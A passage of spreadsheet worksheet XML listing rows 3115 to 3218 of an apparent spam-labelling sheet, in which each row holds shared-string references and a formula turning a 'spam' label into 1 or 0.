    <row r="3115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3115" t="s">
        <v>8251</v>
      </c>
      <c r="B3115" t="s">
        <v>5294</v>
      </c>
      <c r="C3115" s="1">
        <f>IF(B3115="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3116" t="s">
        <v>8252</v>
      </c>
      <c r="B3116" t="s">
        <v>5294</v>
      </c>
      <c r="C3116" s="1">
        <f>IF(B3116="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3117" t="s">
        <v>8253</v>
      </c>
      <c r="B3117" t="s">
        <v>5294</v>
      </c>
      <c r="C3117" s="1">
        <f>IF(B3117="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3118" t="s">
        <v>8254</v>
      </c>
      <c r="B3118" t="s">
        <v>5294</v>
      </c>
      <c r="C3118" s="1">
        <f>IF(B3118="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3119" t="s">
        <v>8255</v>
      </c>
      <c r="B3119" t="s">
        <v>5294</v>
      </c>
      <c r="C3119" s="1">
        <f>IF(B3119="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3120" t="s">
        <v>8256</v>
      </c>
      <c r="B3120" t="s">
        <v>5294</v>
      </c>
      <c r="C3120" s="1">
        <f>IF(B3120="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3121" t="s">
        <v>8257</v>
      </c>
      <c r="B3121" t="s">
        <v>5294</v>
      </c>
      <c r="C3121" s="1">
        <f>IF(B3121="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3122" t="s">
        <v>8258</v>
      </c>
      <c r="B3122" t="s">
        <v>5294</v>
      </c>
      <c r="C3122" s="1">
        <f>IF(B3122="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3123" t="s">
        <v>7133</v>
      </c>
      <c r="B3123" t="s">
        <v>5297</v>
      </c>
      <c r="C3123" s="1">
        <f>IF(B3123="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3124" t="s">
        <v>8259</v>
      </c>
      <c r="B3124" t="s">
        <v>5294</v>
      </c>
      <c r="C3124" s="1">
        <f>IF(B3124="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3125" t="s">
        <v>7019</v>
      </c>
      <c r="B3125" t="s">
        <v>5294</v>
      </c>
      <c r="C3125" s="1">
        <f>IF(B3125="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3126" t="s">
        <v>8260</v>
      </c>
      <c r="B3126" t="s">
        <v>5297</v>
      </c>
      <c r="C3126" s="1">
        <f>IF(B3126="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3127" t="s">
        <v>8261</v>
      </c>
      <c r="B3127" t="s">
        <v>5294</v>
      </c>
      <c r="C3127" s="1">
        <f>IF(B3127="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3128" t="s">
        <v>8262</v>
      </c>
      <c r="B3128" t="s">
        <v>5294</v>
      </c>
      <c r="C3128" s="1">
        <f>IF(B3128="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3129" t="s">
        <v>8263</v>
      </c>
      <c r="B3129" t="s">
        <v>5294</v>
      </c>
      <c r="C3129" s="1">
        <f>IF(B3129="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3130" t="s">
        <v>8264</v>
      </c>
      <c r="B3130" t="s">
        <v>5294</v>
      </c>
      <c r="C3130" s="1">
        <f>IF(B3130="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3131" t="s">
        <v>8265</v>
      </c>
      <c r="B3131" t="s">
        <v>5294</v>
      </c>
      <c r="C3131" s="1">
        <f>IF(B3131="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3132" t="s">
        <v>8266</v>
      </c>
      <c r="B3132" t="s">
        <v>5297</v>
      </c>
      <c r="C3132" s="1">
        <f>IF(B3132="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3133" t="s">
        <v>8267</v>
      </c>
      <c r="B3133" t="s">
        <v>5294</v>
      </c>
      <c r="C3133" s="1">
        <f>IF(B3133="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3134" t="s">
        <v>8268</v>
      </c>
      <c r="B3134" t="s">
        <v>5294</v>
      </c>
      <c r="C3134" s="1">
        <f>IF(B3134="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3135" t="s">
        <v>8269</v>
      </c>
      <c r="B3135" t="s">
        <v>5294</v>
      </c>
      <c r="C3135" s="1">
        <f>IF(B3135="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3136" t="s">
        <v>6354</v>
      </c>
      <c r="B3136" t="s">
        <v>5294</v>
      </c>
      <c r="C3136" s="1">
        <f>IF(B3136="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3137" t="s">
        <v>8270</v>
      </c>
      <c r="B3137" t="s">
        <v>5294</v>
      </c>
      <c r="C3137" s="1">
        <f>IF(B3137="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3138" t="s">
        <v>8271</v>
      </c>
      <c r="B3138" t="s">
        <v>5294</v>
      </c>
      <c r="C3138" s="1">
        <f>IF(B3138="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3139" t="s">
        <v>8272</v>
      </c>
      <c r="B3139" t="s">
        <v>5294</v>
      </c>
      <c r="C3139" s="1">
        <f>IF(B3139="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3140" t="s">
        <v>8273</v>
      </c>
      <c r="B3140" t="s">
        <v>5294</v>
      </c>
      <c r="C3140" s="1">
        <f>IF(B3140="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3141" t="s">
        <v>8274</v>
      </c>
      <c r="B3141" t="s">
        <v>5297</v>
      </c>
      <c r="C3141" s="1">
        <f>IF(B3141="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3142" t="s">
        <v>8275</v>
      </c>
      <c r="B3142" t="s">
        <v>5294</v>
      </c>
      <c r="C3142" s="1">
        <f>IF(B3142="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3143" t="s">
        <v>8276</v>
      </c>
      <c r="B3143" t="s">
        <v>5294</v>
      </c>
      <c r="C3143" s="1">
        <f>IF(B3143="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3144" t="s">
        <v>8277</v>
      </c>
      <c r="B3144" t="s">
        <v>5294</v>
      </c>
      <c r="C3144" s="1">
        <f>IF(B3144="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3145" t="s">
        <v>8278</v>
      </c>
      <c r="B3145" t="s">
        <v>5294</v>
      </c>
      <c r="C3145" s="1">
        <f>IF(B3145="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3146" t="s">
        <v>8279</v>
      </c>
      <c r="B3146" t="s">
        <v>5294</v>
      </c>
      <c r="C3146" s="1">
        <f>IF(B3146="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3147" t="s">
        <v>8280</v>
      </c>
      <c r="B3147" t="s">
        <v>5294</v>
      </c>
      <c r="C3147" s="1">
        <f>IF(B3147="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3148" t="s">
        <v>8281</v>
      </c>
      <c r="B3148" t="s">
        <v>5294</v>
      </c>
      <c r="C3148" s="1">
        <f>IF(B3148="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3149" t="s">
        <v>8282</v>
      </c>
      <c r="B3149" t="s">
        <v>5294</v>
      </c>
      <c r="C3149" s="1">
        <f>IF(B3149="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3150" t="s">
        <v>8283</v>
      </c>
      <c r="B3150" t="s">
        <v>5294</v>
      </c>
      <c r="C3150" s="1">
        <f>IF(B3150="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3151" t="s">
        <v>8284</v>
      </c>
      <c r="B3151" t="s">
        <v>5294</v>
      </c>
      <c r="C3151" s="1">
        <f>IF(B3151="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3152" t="s">
        <v>8285</v>
      </c>
      <c r="B3152" t="s">
        <v>5294</v>
      </c>
      <c r="C3152" s="1">
        <f>IF(B3152="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3153" t="s">
        <v>6954</v>
      </c>
      <c r="B3153" t="s">
        <v>5297</v>
      </c>
      <c r="C3153" s="1">
        <f>IF(B3153="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3154" t="s">
        <v>8286</v>
      </c>
      <c r="B3154" t="s">
        <v>5294</v>
      </c>
      <c r="C3154" s="1">
        <f>IF(B3154="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3155" t="s">
        <v>7472</v>
      </c>
      <c r="B3155" t="s">
        <v>5297</v>
      </c>
      <c r="C3155" s="1">
        <f>IF(B3155="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3156" t="s">
        <v>6531</v>
      </c>
      <c r="B3156" t="s">
        <v>5294</v>
      </c>
      <c r="C3156" s="1">
        <f>IF(B3156="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3157" t="s">
        <v>8287</v>
      </c>
      <c r="B3157" t="s">
        <v>5294</v>
      </c>
      <c r="C3157" s="1">
        <f>IF(B3157="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3158" t="s">
        <v>8288</v>
      </c>
      <c r="B3158" t="s">
        <v>5294</v>
      </c>
      <c r="C3158" s="1">
        <f>IF(B3158="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3159" t="s">
        <v>8289</v>
      </c>
      <c r="B3159" t="s">
        <v>5294</v>
      </c>
      <c r="C3159" s="1">
        <f>IF(B3159="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3160" t="s">
        <v>8290</v>
      </c>
      <c r="B3160" t="s">
        <v>5294</v>
      </c>
      <c r="C3160" s="1">
        <f>IF(B3160="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3161" t="s">
        <v>8291</v>
      </c>
      <c r="B3161" t="s">
        <v>5294</v>
      </c>
      <c r="C3161" s="1">
        <f>IF(B3161="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3162" t="s">
        <v>8292</v>
      </c>
      <c r="B3162" t="s">
        <v>5294</v>
      </c>
      <c r="C3162" s="1">
        <f>IF(B3162="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3163" t="s">
        <v>8293</v>
      </c>
      <c r="B3163" t="s">
        <v>5294</v>
      </c>
      <c r="C3163" s="1">
        <f>IF(B3163="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3164" t="s">
        <v>8294</v>
      </c>
      <c r="B3164" t="s">
        <v>5297</v>
      </c>
      <c r="C3164" s="1">
        <f>IF(B3164="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3165" t="s">
        <v>5642</v>
      </c>
      <c r="B3165" t="s">
        <v>5294</v>
      </c>
      <c r="C3165" s="1">
        <f>IF(B3165="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3166" t="s">
        <v>8295</v>
      </c>
      <c r="B3166" t="s">
        <v>5294</v>
      </c>
      <c r="C3166" s="1">
        <f>IF(B3166="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3167" t="s">
        <v>6621</v>
      </c>
      <c r="B3167" t="s">
        <v>5297</v>
      </c>
      <c r="C3167" s="1">
        <f>IF(B3167="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3168" t="s">
        <v>6193</v>
      </c>
      <c r="B3168" t="s">
        <v>5294</v>
      </c>
      <c r="C3168" s="1">
        <f>IF(B3168="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3169" t="s">
        <v>8296</v>
      </c>
      <c r="B3169" t="s">
        <v>5294</v>
      </c>
      <c r="C3169" s="1">
        <f>IF(B3169="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3170" t="s">
        <v>8297</v>
      </c>
      <c r="B3170" t="s">
        <v>5294</v>
      </c>
      <c r="C3170" s="1">
        <f>IF(B3170="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3171" t="s">
        <v>8298</v>
      </c>
      <c r="B3171" t="s">
        <v>5294</v>
      </c>
      <c r="C3171" s="1">
        <f>IF(B3171="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3172" t="s">
        <v>8299</v>
      </c>
      <c r="B3172" t="s">
        <v>5294</v>
      </c>
      <c r="C3172" s="1">
        <f>IF(B3172="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3173" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3173" t="s">
        <v>8300</v>
      </c>
      <c r="B3173" t="s">
        <v>5294</v>
      </c>
      <c r="C3173" s="1">
        <f>IF(B3173="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3174" t="s">
        <v>8301</v>
      </c>
      <c r="B3174" t="s">
        <v>5297</v>
      </c>
      <c r="C3174" s="1">
        <f>IF(B3174="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3175" t="s">
        <v>8302</v>
      </c>
      <c r="B3175" t="s">
        <v>5294</v>
      </c>
      <c r="C3175" s="1">
        <f>IF(B3175="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3176" t="s">
        <v>6979</v>
      </c>
      <c r="B3176" t="s">
        <v>5297</v>
      </c>
      <c r="C3176" s="1">
        <f>IF(B3176="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3177" t="s">
        <v>8303</v>
      </c>
      <c r="B3177" t="s">
        <v>5294</v>
      </c>
      <c r="C3177" s="1">
        <f>IF(B3177="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3178" t="s">
        <v>8304</v>
      </c>
      <c r="B3178" t="s">
        <v>5294</v>
      </c>
      <c r="C3178" s="1">
        <f>IF(B3178="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3179" t="s">
        <v>8305</v>
      </c>
      <c r="B3179" t="s">
        <v>5294</v>
      </c>
      <c r="C3179" s="1">
        <f>IF(B3179="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3180" t="s">
        <v>8306</v>
      </c>
      <c r="B3180" t="s">
        <v>5294</v>
      </c>
      <c r="C3180" s="1">
        <f>IF(B3180="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3181" t="s">
        <v>8307</v>
      </c>
      <c r="B3181" t="s">
        <v>5294</v>
      </c>
      <c r="C3181" s="1">
        <f>IF(B3181="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3182" t="s">
        <v>8308</v>
      </c>
      <c r="B3182" t="s">
        <v>5294</v>
      </c>
      <c r="C3182" s="1">
        <f>IF(B3182="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3183" t="s">
        <v>8309</v>
      </c>
      <c r="B3183" t="s">
        <v>5294</v>
      </c>
      <c r="C3183" s="1">
        <f>IF(B3183="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3184" t="s">
        <v>8310</v>
      </c>
      <c r="B3184" t="s">
        <v>5294</v>
      </c>
      <c r="C3184" s="1">
        <f>IF(B3184="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3185" t="s">
        <v>8311</v>
      </c>
      <c r="B3185" t="s">
        <v>5294</v>
      </c>
      <c r="C3185" s="1">
        <f>IF(B3185="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3186" t="s">
        <v>8312</v>
      </c>
      <c r="B3186" t="s">
        <v>5294</v>
      </c>
      <c r="C3186" s="1">
        <f>IF(B3186="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3187" t="s">
        <v>8313</v>
      </c>
      <c r="B3187" t="s">
        <v>5294</v>
      </c>
      <c r="C3187" s="1">
        <f>IF(B3187="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3188" t="s">
        <v>7187</v>
      </c>
      <c r="B3188" t="s">
        <v>5294</v>
      </c>
      <c r="C3188" s="1">
        <f>IF(B3188="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3189" t="s">
        <v>8314</v>
      </c>
      <c r="B3189" t="s">
        <v>5297</v>
      </c>
      <c r="C3189" s="1">
        <f>IF(B3189="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3190" t="s">
        <v>8315</v>
      </c>
      <c r="B3190" t="s">
        <v>5294</v>
      </c>
      <c r="C3190" s="1">
        <f>IF(B3190="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3191" t="s">
        <v>8316</v>
      </c>
      <c r="B3191" t="s">
        <v>5294</v>
      </c>
      <c r="C3191" s="1">
        <f>IF(B3191="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3192" t="s">
        <v>8317</v>
      </c>
      <c r="B3192" t="s">
        <v>5297</v>
      </c>
      <c r="C3192" s="1">
        <f>IF(B3192="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3193" t="s">
        <v>8318</v>
      </c>
      <c r="B3193" t="s">
        <v>5294</v>
      </c>
      <c r="C3193" s="1">
        <f>IF(B3193="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3194" t="s">
        <v>8319</v>
      </c>
      <c r="B3194" t="s">
        <v>5294</v>
      </c>
      <c r="C3194" s="1">
        <f>IF(B3194="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3195" t="s">
        <v>8320</v>
      </c>
      <c r="B3195" t="s">
        <v>5294</v>
      </c>
      <c r="C3195" s="1">
        <f>IF(B3195="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3196" t="s">
        <v>8321</v>
      </c>
      <c r="B3196" t="s">
        <v>5294</v>
      </c>
      <c r="C3196" s="1">
        <f>IF(B3196="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3197" t="s">
        <v>8322</v>
      </c>
      <c r="B3197" t="s">
        <v>5294</v>
      </c>
      <c r="C3197" s="1">
        <f>IF(B3197="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3198" t="s">
        <v>8323</v>
      </c>
      <c r="B3198" t="s">
        <v>5294</v>
      </c>
      <c r="C3198" s="1">
        <f>IF(B3198="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3199" t="s">
        <v>8324</v>
      </c>
      <c r="B3199" t="s">
        <v>5294</v>
      </c>
      <c r="C3199" s="1">
        <f>IF(B3199="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3200" t="s">
        <v>8325</v>
      </c>
      <c r="B3200" t="s">
        <v>5294</v>
      </c>
      <c r="C3200" s="1">
        <f>IF(B3200="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3201" t="s">
        <v>8326</v>
      </c>
      <c r="B3201" t="s">
        <v>5294</v>
      </c>
      <c r="C3201" s="1">
        <f>IF(B3201="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3202" t="s">
        <v>7997</v>
      </c>
      <c r="B3202" t="s">
        <v>5294</v>
      </c>
      <c r="C3202" s="1">
        <f>IF(B3202="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3203" t="s">
        <v>8327</v>
      </c>
      <c r="B3203" t="s">
        <v>5294</v>
      </c>
      <c r="C3203" s="1">
        <f>IF(B3203="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3204" t="s">
        <v>8328</v>
      </c>
      <c r="B3204" t="s">
        <v>5294</v>
      </c>
      <c r="C3204" s="1">
        <f>IF(B3204="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3205" t="s">
        <v>8329</v>
      </c>
      <c r="B3205" t="s">
        <v>5294</v>
      </c>
      <c r="C3205" s="1">
        <f>IF(B3205="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3206" t="s">
        <v>8330</v>
      </c>
      <c r="B3206" t="s">
        <v>5294</v>
      </c>
      <c r="C3206" s="1">
        <f>IF(B3206="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3207" t="s">
        <v>8331</v>
      </c>
      <c r="B3207" t="s">
        <v>5294</v>
      </c>
      <c r="C3207" s="1">
        <f>IF(B3207="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3208" t="s">
        <v>8332</v>
      </c>
      <c r="B3208" t="s">
        <v>5294</v>
      </c>
      <c r="C3208" s="1">
        <f>IF(B3208="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3209" t="s">
        <v>8333</v>
      </c>
      <c r="B3209" t="s">
        <v>5294</v>
      </c>
      <c r="C3209" s="1">
        <f>IF(B3209="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3210" t="s">
        <v>8334</v>
      </c>
      <c r="B3210" t="s">
        <v>5294</v>
      </c>
      <c r="C3210" s="1">
        <f>IF(B3210="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3211" t="s">
        <v>8335</v>
      </c>
      <c r="B3211" t="s">
        <v>5294</v>
      </c>
      <c r="C3211" s="1">
        <f>IF(B3211="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3212" t="s">
        <v>8336</v>
      </c>
      <c r="B3212" t="s">
        <v>5294</v>
      </c>
      <c r="C3212" s="1">
        <f>IF(B3212="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3213" t="s">
        <v>8337</v>
      </c>
      <c r="B3213" t="s">
        <v>5294</v>
      </c>
      <c r="C3213" s="1">
        <f>IF(B3213="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3214" t="s">
        <v>8338</v>
      </c>
      <c r="B3214" t="s">
        <v>5294</v>
      </c>
      <c r="C3214" s="1">
        <f>IF(B3214="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3215" t="s">
        <v>8339</v>
      </c>
      <c r="B3215" t="s">
        <v>5294</v>
      </c>
      <c r="C3215" s="1">
        <f>IF(B3215="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3216" t="s">
        <v>8340</v>
      </c>
      <c r="B3216" t="s">
        <v>5294</v>
      </c>
      <c r="C3216" s="1">
        <f>IF(B3216="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3217" t="s">
        <v>8341</v>
      </c>
      <c r="B3217" t="s">
        <v>5297</v>
      </c>
      <c r="C3217" s="1">
        <f>IF(B3217="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3218" t="s">
        <v>8342</v>
      </c>
      <c r="B3218" t="s">
        <v>5294</v>
      </c>
      <c r="C3218" s="1">
        <f>IF(B3218="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
